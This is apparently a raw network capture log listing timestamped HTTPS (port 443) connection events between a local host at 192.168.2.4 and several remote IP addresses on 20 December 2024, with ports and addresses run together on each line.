                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.731304884 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.731543064 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.738284111 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.738358021 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.748785973 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.749085903 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.749151945 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.750605106 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.750776052 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.752166986 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.752166986 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.752198935 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.752269983 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.789221048 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.789355993 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.790828943 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.791145086 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.797564030 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.797728062 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.803961992 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.803982973 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829721928 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829773903 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829977989 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.830194950 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.830226898 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.849817991 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.861215115 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.861411095 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.865513086 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.865796089 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.870946884 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.871364117 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.871400118 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.871911049 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.871912003 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.989504099 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.989815950 CET4434997852.223.40.198192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.989969015 CET49978443192.168.2.452.223.40.198
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.030391932 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.030445099 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.032838106 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.033301115 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.033333063 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.111071110 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.111113071 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.111233950 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.112741947 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.112763882 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.178709984 CET49970443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.178740978 CET4434997062.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.490375042 CET44349979104.19.230.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.503676891 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.503736019 CET44349979104.19.230.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.504928112 CET44349979104.19.230.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.547578096 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.558990002 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.559181929 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.559214115 CET44349979104.19.230.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.599361897 CET44349979104.19.230.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.601191044 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.668190002 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.668294907 CET44349979104.19.230.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.668371916 CET49979443192.168.2.4104.19.230.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.705768108 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.706094980 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.706125021 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.706341982 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.706557989 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.706613064 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.707586050 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.707662106 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708132029 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708173990 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708235025 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708239079 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708283901 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708524942 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708614111 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.708642960 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.751332045 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.751362085 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.755690098 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.755712032 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.755713940 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.755734921 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.801863909 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.801870108 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.177221060 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.177392960 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.177469969 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.178899050 CET49980443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.178946018 CET44349980104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.243263006 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.244266987 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.244338989 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.244560003 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.244618893 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.244729996 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.245058060 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.245091915 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.245208025 CET49981443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.245245934 CET44349981104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.422871113 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.423130989 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.423162937 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.424314022 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.424693108 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.424870968 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.424877882 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.467331886 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.474757910 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.488482952 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.488706112 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.488729000 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.489617109 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.489684105 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.492855072 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.492921114 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.493113041 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.493130922 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.533835888 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.568541050 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.569006920 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.569030046 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.570461035 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.570558071 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.574569941 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.574659109 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.615158081 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.615180016 CET4434998234.233.219.14192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.627868891 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.627926111 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.628016949 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.628366947 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.628396034 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:21.662847042 CET49982443192.168.2.434.233.219.14
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.467149973 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.467504978 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.467562914 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.468713999 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.469063044 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.469191074 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.469254971 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.518258095 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.954288006 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.954610109 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.954732895 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.996879101 CET49985443192.168.2.4104.19.229.21
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:22.996944904 CET44349985104.19.229.21192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.050235987 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.076092958 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.076159000 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.077589989 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.095832109 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.095980883 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.096000910 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.096187115 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.150360107 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.912756920 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.913155079 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.913218021 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.913945913 CET49983443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:23.913984060 CET4434998362.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078564882 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078635931 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078708887 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078730106 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078762054 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078804016 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078804016 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.078886032 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.079037905 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.079101086 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.079426050 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.079426050 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.079473972 CET4434998462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.079546928 CET49984443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.087387085 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.087460995 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.087567091 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.087863922 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.087893963 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.664239883 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.664561987 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.664634943 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.666044950 CET49986443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.666079044 CET4434998662.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.677989006 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.678025007 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.678153038 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.678508043 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:25.678524971 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.486430883 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.486762047 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.486789942 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.487930059 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.488286972 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.488457918 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.488483906 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.531352043 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:26.536681890 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.096204042 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.098372936 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.098387957 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.099589109 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.100115061 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.100202084 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.100289106 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:27.146083117 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.298826933 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.298861980 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.298928022 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.299319029 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.299335003 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.666318893 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.666404963 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.666502953 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.667365074 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:28.667402029 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.719464064 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.720011950 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.720038891 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.721097946 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.721720934 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.721815109 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.721913099 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.767364979 CET4434999162.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.771342993 CET49991443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842215061 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842242002 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842273951 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842350960 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842375994 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842392921 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842413902 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.842441082 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.843683004 CET49987443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:29.843694925 CET4434998762.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.061707973 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.064620972 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.064659119 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.065809011 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.066163063 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.066303015 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.066310883 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.066618919 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.115098953 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.138484001 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.138813019 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.138927937 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.139842987 CET49989443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:30.139870882 CET4434998962.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.651113987 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.652350903 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.652550936 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.652741909 CET49992443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.652795076 CET4434999262.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.656502008 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.656548977 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.656630039 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.656946898 CET50004443192.168.2.462.60.154.114
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.656959057 CET4435000462.60.154.114192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:32.853826046 CET4434999162.60.154.114192.168.2.4
